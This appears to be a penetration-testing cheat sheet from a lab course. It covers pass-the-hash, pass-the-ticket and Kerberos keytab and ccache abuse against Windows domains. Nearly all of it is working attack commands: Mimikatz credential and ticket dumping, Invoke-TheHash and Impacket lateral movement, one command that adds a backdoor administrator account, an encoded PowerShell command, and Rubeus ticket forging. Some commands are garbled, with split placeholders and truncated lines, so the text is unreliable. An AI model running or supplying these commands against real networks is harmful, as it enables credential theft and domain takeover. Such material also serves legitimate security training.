Pass The Hash (Mimikatz)
Copy mimikatz.exe privilege::debug "sekurlsa::pth /user:<user> /rc4:<hash> /domain:inlanefreight.htb /run:cmd.exe" exit Pass The Hash (Invoke-TheHash)
Copy # Import Module
Import-Module . \Invoke-TheHash .psd1
# Pass The Hash
Invoke-SMBExec -Target <IP> -Domain <domain> -Username <username> -Hash <hash> -Command "net user 0xF0rk Password123 /add && net localgroup administrators 0xF0rk /add" -Verbose
# With WMI
Invoke-WMIExec - Target DC01 - Domain < domain > - Username < user > - Hash < hash > - Command "powershell -e <base64 command>" Pass the Hash Impacket (Linux)
Copy impacket-psexec administrator@ < I P > -hashes : < has h >
Pass The Hash CrackMapExec (LInux)
Copy crackmapexec smb < I P > -u Administrator -d . -H < has h > --local-auth Pass The Hash RDP
Copy # Enable RDP
reg add HKLM\System\CurrentControlSet\Control\Lsa / t REG_DWORD / v DisableRestrictedAdmin / d 0x0 / f
# RDP
xfreerdp / v: < IP > / u: < user > / pth: < hash > Harvesting Tickets From Windows
Copy # Mimikatz
## Check Privs
privilege::debug
# Show Tickets
sekurlsa::tickets /export
# Rubeus
Rubeus.exe dump /nowrap Pass the Key or OverPass the Hash
Copy # Mimikatz Extract Keys
privilege::debug
sekurlsa::ekeys
# Mimikatz OverPass the Hash
sekurlsa::pth / domain:inlanefreight.htb / user: < user > / ntlm: < rc4_value >
# Rubeus
Rubeus.exe asktgt / domain:inlanefreight.htb / user:plaintext / aes256: < aes256_hmac_Value > Pass the Ticket (PtT)
Copy # Rubeus
## /ptt -> current session
Rubeus.exe asktgt / domain:inlanefreight.htb / user:plaintext / rc4: < rc4_value >
# Import .Kirbi
Rubeus.exe ptt / ticket:file.kirbi
# Base64 Encode .Kirbi
Convert]::ToBase64String([ IO.File ]::ReadAllBytes( "file.kirbi" ))
# Import With Base64
Rubeus.exe ptt / ticket: < base6 4> Pass The Ticket PowerShell Remoting
Copy # Import Ticket
kerberos::ptt "file.kirbi"
# Enter PC
Enter-PSSession -ComputerName < computernam e > Pass The Ticket (From Linux)
Check Linux Machine Domain Joined
Copy realm list
ps -ef | grep -i "winbind\|sssd"
Find Keytab Files
Copy find / -name *keytab* -ls 2> /dev/null Find ccache Files
A credential cache or ccache file holds Kerberos credentials while they remain valid and, generally, while the user's session lasts.
Abusing KeyTab Files
Copy # Klist List Keytab files
klist -k -l
# Impersonate Other User
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
# Verify
klist
Copy python3 / opt / blackbuntu / keytabextract . py file . keytab Abusing Keytab ccache
To abuse a ccache file, all we need is read privileges on the file. These files, located in /tmp, can only be read by the user who created them, but if we gain root access, we could use them.
Copy # Import ccache file
export KRB5CCNAME =< fileL
klist
# Able to read DC
smbclient //dc01/C $ -k -c ls -no-pass Convert ccache file for Windows
Copy https://github.com/fortra/impacket/blob/master/examples/ticketConverter.py
